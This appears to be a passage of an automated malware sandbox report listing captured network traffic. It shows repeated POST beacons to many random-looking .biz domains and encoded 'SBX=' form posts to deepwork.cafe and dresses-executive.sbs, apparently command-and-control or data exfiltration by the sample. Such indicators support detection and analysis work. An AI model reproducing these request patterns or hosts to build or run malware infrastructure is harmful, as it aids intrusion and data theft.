Source: global traffic	HTTP traffic detected: POST /dyhqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /bsmlc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ofvfugdrcdlw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cvv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pytoqscgrrqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /keiggofpmujlpsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cvfuovkrbl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /ytedfhxqcjbfitqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /oeqnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /dgbaojvdphepe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /u HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /yjo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6c 78 6e 6f 52 46 6f 41 7a 36 51 39 34 51 47 35 6c 34 61 6e 58 30 57 58 39 76 48 34 5a 38 50 54 53 5a 6e 77 2f 31 42 43 75 61 46 70 33 7a 38 4e 48 62 4d 35 79 43 41 4f 65 67 56 37 79 73 51 59 67 4d 56 73 4a 50 43 48 4b 4c 74 61 70 70 52 4a 4e 39 36 34 46 32 73 44 66 2f 58 30 4c 55 6e 70 70 50 31 77 70 6a 79 6b 59 56 32 4f 31 62 42 57 74 2b 72 63 4b 5a 54 75 73 37 4a 63 67 72 6b 65 6e 72 45 36 7a 55 2b 52 79 4f 32 59 72 62 53 34 75 59 56 44 6e 68 30 6b 6c 74 31 54 52 70 67 38 6f 57 73 2b 4b 30 42 4a 45 43 55 69 73 69 67 70 65 74 42 51 44 41 3d 3d Data Ascii: SBX=iqKaQQ5tKlqPlxnoRFoAz6Q94QG5l4anX0WX9vH4Z8PTSZnw/1BCuaFp3z8NHbM5yCAOegV7ysQYgMVsJPCHKLtappRJN964F2sDf/X0LUnppP1wpjykYV2O1bBWt+rcKZTus7JcgrkenrE6zU+RyO2YrbS4uYVDnh0klt1TRpg8oWs+K0BJECUisigpetBQDA==
Source: global traffic	HTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /vc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6e 51 58 6f 54 6d 51 41 37 36 51 79 39 51 47 35 75 59 61 6a 58 30 61 58 39 74 33 6f 5a 4a 58 54 53 34 33 77 2b 30 42 43 37 61 46 70 38 54 38 49 45 72 4d 75 79 43 64 7a 65 6c 74 37 79 73 55 59 67 4a 70 73 49 38 36 47 4c 62 74 45 68 4a 52 4c 44 64 36 34 46 32 73 44 66 2f 72 53 4c 55 2f 70 6f 38 39 77 76 42 61 72 52 31 32 4e 69 72 42 57 6d 65 72 59 4b 5a 54 32 73 35 74 32 67 70 63 65 6e 70 63 36 30 46 2b 51 6c 65 32 43 6d 37 54 32 6d 74 6b 59 67 78 74 4e 71 76 6b 39 51 74 35 59 74 51 68 6b 62 46 67 65 57 43 77 52 78 6c 70 64 54 75 38 5a 59 4c 52 72 4f 73 52 6d 7a 36 4e 6d 70 6a 64 7a 6d 46 4b 70 36 54 45 3d Data Ascii: SBX=iqKaQQ5tKlqPnQXoTmQA76Qy9QG5uYajX0aX9t3oZJXTS43w+0BC7aFp8T8IErMuyCdzelt7ysUYgJpsI86GLbtEhJRLDd64F2sDf/rSLU/po89wvBarR12NirBWmerYKZT2s5t2gpcenpc60F+Qle2Cm7T2mtkYgxtNqvk9Qt5YtQhkbFgeWCwRxlpdTu8ZYLRrOsRmz6NmpjdzmFKp6TE=
Source: global traffic	HTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /nrkbrruypflu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /rnvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6e 51 58 6f 54 6d 51 41 37 36 51 79 39 51 47 35 75 59 61 6a 58 30 61 58 39 74 33 6f 5a 4b 33 54 53 71 76 77 2f 58 70 43 70 71 46 70 2f 54 38 4a 45 72 4d 76 79 43 45 34 65 6b 52 42 79 66 41 59 68 63 46 73 66 75 43 47 4a 72 74 45 30 5a 51 43 48 64 37 7a 46 32 38 66 66 2f 58 53 4c 58 37 70 6f 38 39 77 70 54 79 72 59 46 32 31 69 72 42 45 70 2b 72 63 4b 5a 54 75 73 36 68 6d 67 39 6f 65 6e 4a 4d 36 32 33 57 51 36 75 32 63 6a 37 53 72 6d 74 67 64 67 78 46 2f 71 72 70 32 51 5a 6c 59 67 47 6b 61 42 51 41 56 49 30 63 33 6c 48 4e 6f 66 5a 73 64 52 4a 4a 67 46 39 64 78 6c 34 46 4f 6d 30 6b 64 78 6d 6d 59 70 33 4b 66 35 45 47 33 61 76 4f 70 33 37 6e 38 56 7a 72 32 48 6e 61 63 48 75 42 69 62 7a 59 77 68 62 2f 78 65 36 4d 63 74 6a 61 4c 2b 70 68 71 31 4e 66 4f 33 33 72 77 4d 43 38 69 4a 56 75 35 4a 4c 37 71 39 70 36 71 7a 47 6a 51 44 71 4f 6e 35 71 49 5a 49 68 6a 48 69 35 42 72 49 44 31 6e 67 30 2f 79 56 74 37 57 47 76 46 44 6f 31 69 7a 51 6b 2b 79 43 72 64 7a 55 6c 79 78 4c 76 78 74 49 78 43 58 76 68 69 49 76 47 2b 65 71 4a 68 64 66 52 71 62 41 4c 6e 4d 2f 79 4d 74 2f 55 54 56 35 59 56 4e 57 52 31 30 50 68 62 7a 50 5a 51 52 78 6b 36 66 30 62 41 77 57 32 7a 4a 4a 31 6d 4d 75 75 31 48 37 33 63 4e 62 4a 72 68 7a 52 52 42 4a 2b 71 37 2b 6c 31 61 4c 59 38 76 65 37 71 35 59 71 32 62 62 53 37 30 74 2f 5a 51 73 6c 5a 4f 73 48 48 47 47 43 69 6f 75 2b 62 51 73 44 6a 73 30 76 58 6f 59 70 59 51 53 39 56 72 42 31 77 35 49 30 78 47 7a 68 4c 62 71 47 7a 74 58 4f 44 5a 63 64 59 65 54 4c 72 66 34 55 58 4e 67 49 4a 55 34 33 6d 4c 33 49 53 67 52 6e 38 2b 34 30 69 46 62 74 30 66 66 4b 67 64 2b 66 46 6e 4c 73 4c 35 54 51 63 7a 56 56 69 48 74 71 52 76 33 73 7a 43 69 46 64 48 31 7a 4f 77 6f 7a 6e 77 6e 46 42 56 59 65 2f 66 56 42 71 2f 37 36 62 39 78 2b 76 6f 4b 68 57 4b 51 65 67 4c 33 31 4a 52 58 66 6f 31 49 38 7a 2f 6e 6a 34 72 4a 4b 43 67 34 66 4b 52 6b 4d 57 73 4c 36 70 78 69 78 6d 2f 45 56 6e 2f 58 71 68 53 56 78 76 44 65 65 55 39 52 43 7a 59 32 30 45 7a 36 30 45 2f 45 4c 70 50 4d 47 43 39 47 6f 68 75 33 6a 73 4a 2b 44 42 68 70 6c 79 6b 2b 6a 73 55 32 65 74 50 66 36 33 52 52 64 4a 38 6b 63 4f 77 31 30 76 4b 31 47 4a 63 4d 62 57 6b 54 4a 56 45 39 54 55 61 38 62 33 30 6b 6f 59 45 4d 77 75 32 73 33 44 79 4c 70 6a 68 6c 4d 37 73 6a 71 2b 64 66 2f 58 68 30 73 45 32 34 64 4c 6c 4c 66 4a 67 37 62 6a 7a 2f 4d 45 77 68 51 32 4a 59 51 47 6b 53
Source: global traffic	HTTP traffic detected: POST /rbplxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /wvmcmvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /efhwytptlfas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /pyxq/?SBX=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deepwork.cafeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /mrnvptiyhruij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cpswkmvdqgso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /akhvxcouasoye HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pbepstjyjit HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 2b 74 52 31 41 71 6f 45 57 6b 7a 41 59 59 58 35 35 46 6e 46 38 69 2f 65 6a 4b 67 72 73 68 66 47 38 72 78 53 39 69 58 68 77 41 46 6e 67 68 4b 67 61 30 4c 78 4f 36 33 4f 72 48 4a 30 70 78 58 4d 41 75 2f 69 41 4d 76 53 41 44 70 76 35 78 58 34 6c 64 79 71 34 74 34 6b 4b 76 63 58 6e 72 71 59 44 45 2f 75 41 35 42 5a 4d 36 54 38 30 6c 4e 55 5a 4f 41 62 63 33 6f 43 65 4a 58 71 55 71 4c 75 54 51 32 32 2f 49 32 42 4a 43 41 56 77 59 51 47 45 4d 39 50 54 37 32 67 67 6f 54 50 36 66 65 32 49 56 56 78 6e 63 53 44 2b 73 78 68 57 58 37 64 4a 4d 7a 2b 2f 51 3d 3d Data Ascii: SBX=dNmRNBB7Fiyv+tR1AqoEWkzAYYX55FnF8i/ejKgrshfG8rxS9iXhwAFnghKga0LxO63OrHJ0pxXMAu/iAMvSADpv5xX4ldyq4t4kKvcXnrqYDE/uA5BZM6T80lNUZOAbc3oCeJXqUqLuTQ22/I2BJCAVwYQGEM9PT72ggoTP6fe2IVVxncSD+sxhWX7dJMz+/Q==
Source: global traffic	HTTP traffic detected: POST /poxjlsdujgwqdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /sbiwqdey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /hehuxfgxngeapgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 38 4d 42 31 46 4e 30 45 65 6b 7a 44 55 34 58 35 72 46 6e 2f 38 69 37 65 6a 49 4d 43 72 54 37 47 2f 4c 42 53 76 7a 58 68 7a 41 46 6e 34 52 4b 6c 48 6b 4c 36 4f 36 37 47 72 43 78 30 70 31 2f 4d 41 75 76 69 41 66 48 56 41 54 70 74 6e 52 58 36 68 64 79 71 34 74 34 6b 4b 75 38 39 6e 71 43 59 44 30 76 75 43 59 42 61 58 61 54 37 67 31 4e 55 64 4f 41 66 63 33 6f 61 65 4d 72 51 55 73 58 75 54 56 79 32 2f 62 75 47 41 43 41 66 30 59 52 74 45 64 45 52 56 4b 62 6f 2b 65 50 7a 2f 76 57 74 45 7a 59 72 32 74 7a 55 73 73 56 53 4c 51 79 70 45 50 4f 33 6b 51 6b 75 72 36 63 6d 73 79 33 6b 51 52 52 71 73 52 54 7a 45 48 6b 3d Data Ascii: SBX=dNmRNBB7Fiyv8MB1FN0EekzDU4X5rFn/8i7ejIMCrT7G/LBSvzXhzAFn4RKlHkL6O67GrCx0p1/MAuviAfHVATptnRX6hdyq4t4kKu89nqCYD0vuCYBaXaT7g1NUdOAfc3oaeMrQUsXuTVy2/buGACAf0YRtEdERVKbo+ePz/vWtEzYr2tzUssVSLQypEPO3kQkur6cmsy3kQRRqsRTzEHk=
Source: global traffic	HTTP traffic detected: POST /jpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /tisbvbojxhalb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /nkw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /nfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 38 4d 42 31 46 4e 30 45 65 6b 7a 44 55 34 58 35 72 46 6e 2f 38 69 37 65 6a 49 4d 43 72 54 7a 47 2f 34 4a 53 39 41 2f 68 39 67 46 6e 6d 68 4b 6b 48 6b 4c 6e 4f 36 7a 4b 72 43 4d 44 70 69 48 4d 43 39 58 69 51 4e 76 56 63 54 70 74 33 52 58 2b 72 39 79 57 34 70 55 67 4b 76 63 39 6e 72 65 59 44 30 76 75 44 4a 42 61 4a 36 54 35 67 31 4d 4c 58 75 41 62 63 33 6f 43 65 4a 4f 58 56 61 6e 75 54 31 43 32 34 6f 4b 47 42 69 41 5a 7a 59 52 31 45 63 34 55 56 4b 43 30 2b 61 44 6a 2f 62 43 74 53 53 6c 4d 76 63 47 44 39 39 68 64 64 53 75 36 4d 4e 2b 63 68 69 41 76 74 62 4e 79 75 53 2f 6b 4b 67 38 5a 2b 51 50 49 66 68 70 47 6a 4f 53 44 41 36 78 63 72 46 56 58 39 72 30 64 72 4a 43 51 59 67 55 49 35 34 77 6b 6c 68 77 73 49 6c 62 4a 33 53 35 75 45 66 43 4d 70 4f 64 4c 47 71 69 58 4f 2f 4b 38 31 64 4f 59 42 78 39 62 51 78 4b 35 4c 42 44 55 54 6a 53 45 63 31 2b 6a 52 4a 66 71 57 35 68 5a 43 43 6e 4f 68 7a 37 62 78 53 76 76 69 54 6e 4e 41 72 57 43 57 64 30 63 6a 35 79 74 61 56 2f 6c 75 2b 50 33 4f 66 4f 66 54 59 62 74 42 63 61 70 5a 6b 63 39 2b 4e 6f 4a 51 4a 45 31 65 50 74 5a 5a 72 51 48 73 56 6f 